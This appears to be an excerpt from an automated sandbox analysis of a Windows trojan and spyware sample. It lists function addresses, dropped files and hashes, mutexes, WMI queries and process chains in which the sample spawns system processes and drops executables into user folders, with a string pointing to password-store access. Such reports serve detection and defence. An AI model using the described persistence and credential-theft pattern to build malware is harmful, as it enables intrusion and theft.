                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935FBD812_2_00007FF72935FBD8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729351F3012_2_00007FF729351F30
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72934979B12_2_00007FF72934979B
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729349FCD12_2_00007FF729349FCD
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729365C7413_2_00007FF729365C74
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729364F1013_2_00007FF729364F10
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72934100013_2_00007FF729341000
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729350A6013_2_00007FF729350A60
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935128013_2_00007FF729351280
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729368A3813_2_00007FF729368A38
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729357AAC13_2_00007FF729357AAC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72936518C13_2_00007FF72936518C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935D20013_2_00007FF72935D200
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293591B013_2_00007FF7293591B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729350C6413_2_00007FF729350C64
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935148413_2_00007FF729351484
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729352CC413_2_00007FF729352CC4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729360B8413_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729348B2013_2_00007FF729348B20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935FBD813_2_00007FF72935FBD8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293573F413_2_00007FF7293573F4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293633BC13_2_00007FF7293633BC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729350E7013_2_00007FF729350E70
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935CD6C13_2_00007FF72935CD6C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293495FB13_2_00007FF7293495FB
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935107413_2_00007FF729351074
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935D88013_2_00007FF72935D880
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935504013_2_00007FF729355040
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293528C013_2_00007FF7293528C0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729362F2013_2_00007FF729362F20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72936572813_2_00007FF729365728
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72935FBD813_2_00007FF72935FBD8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729351F3013_2_00007FF729351F30
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72934979B13_2_00007FF72934979B
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729349FCD13_2_00007FF729349FCD
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC2C4813_2_00007FFBABAC2C48
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAB7BFC13_2_00007FFBABAB7BFC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5FBE013_2_00007FFBABA5FBE0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA55B5C13_2_00007FFBABA55B5C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA6DAC013_2_00007FFBABA6DAC0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC2A6813_2_00007FFBABAC2A68
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA628B013_2_00007FFBABA628B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5D03013_2_00007FFBABA5D030
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA52FA013_2_00007FFBABA52FA0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA7F00013_2_00007FFBABA7F000
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5FF6013_2_00007FFBABA5FF60
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAF5E6413_2_00007FFBABAF5E64
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA80E1513_2_00007FFBABA80E15
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAF8DF813_2_00007FFBABAF8DF8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA7C42913_2_00007FFBABA7C429
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5233C13_2_00007FFBABA5233C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA7238413_2_00007FFBABA72384
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5C36013_2_00007FFBABA5C360
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA762D013_2_00007FFBABA762D0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5831013_2_00007FFBABA58310
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA6030013_2_00007FFBABA60300
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5327413_2_00007FFBABA53274
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA7120013_2_00007FFBABA71200
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA6D12013_2_00007FFBABA6D120
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAE00BC13_2_00007FFBABAE00BC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5885413_2_00007FFBABA58854
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA9274013_2_00007FFBABA92740
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA616D013_2_00007FFBABA616D0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA526F813_2_00007FFBABA526F8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA6F5A413_2_00007FFBABA6F5A4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA5F52013_2_00007FFBABA5F520
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBBCF72DD013_2_00007FFBBCF72DD0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBBCF76AE413_2_00007FFBBCF76AE4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC31337B013_2_00007FFBC31337B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3131A8013_2_00007FFBC3131A80
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC313521C13_2_00007FFBC313521C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC313263013_2_00007FFBC3132630
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3131A8013_2_00007FFBC3131A80
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3133CF013_2_00007FFBC3133CF0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC313314013_2_00007FFBC3133140
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3132D3013_2_00007FFBC3132D30
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC31D71CC13_2_00007FFBC31D71CC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC31DD13013_2_00007FFBC31DD130
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe F40224CA24A6D189791058779EB4C9BAB224CAA58B00BD787B1FF981D285D5A4
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCode function: String function: 00007FF6DAD714EC appears 106 times
                    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF67E6D14EC appears 106 times
                    Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF7EE0614EC appears 106 times
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: String function: 00007FF7293425F0 appears 100 times
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: String function: 00007FF729342760 appears 36 times
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: String function: 00007FF7853114EC appears 106 times
                    Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF6EC8414EC appears 106 times
                    Source: api-ms-win-core-file-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-debug-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l2-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
                    Source: 3Qv3xyyL5G.exeBinary or memory string: OriginalFilename vs 3Qv3xyyL5G.exe
                    Source: 3Qv3xyyL5G.exe, 00000000.00000003.1527818885.0000000000D80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 3Qv3xyyL5G.exe
                    Source: 3Qv3xyyL5G.exe, 00000000.00000003.1528353304.0000000002E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 3Qv3xyyL5G.exe
                    Source: 3Qv3xyyL5G.exe, 00000000.00000003.1528268336.0000000000DD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 3Qv3xyyL5G.exe
                    Source: 3Qv3xyyL5G.exe, 00000000.00000000.1526884614.00007FF785319000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs 3Qv3xyyL5G.exe
                    Source: 3Qv3xyyL5G.exeBinary or memory string: OriginalFilenameServices.exe2 vs 3Qv3xyyL5G.exe
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/57@0/1
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293429E0 GetLastError,FormatMessageW,MessageBoxW,12_2_00007FF7293429E0
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853140B0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF7853140B0
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6D40B0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_00007FF67E6D40B0
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCode function: 7_2_00007FF6DAD740B0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_00007FF6DAD740B0
                    Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC8440B0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,9_2_00007FF6EC8440B0
                    Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF7EE0640B0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,10_2_00007FF7EE0640B0
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF785313DF0 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF785313DF0
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeFile created: C:\Users\user\AppData\Roaming\65D35BAB97073674480464Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                    Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeMutant created: NULL
                    Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                    Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\25A2.tmpJump to behavior
                    Source: 3Qv3xyyL5G.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003433000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeFile read: C:\Users\user\Desktop\3Qv3xyyL5G.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\3Qv3xyyL5G.exe "C:\Users\user\Desktop\3Qv3xyyL5G.exe"
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe "C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe"
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe"
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe "C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe "C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe" Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
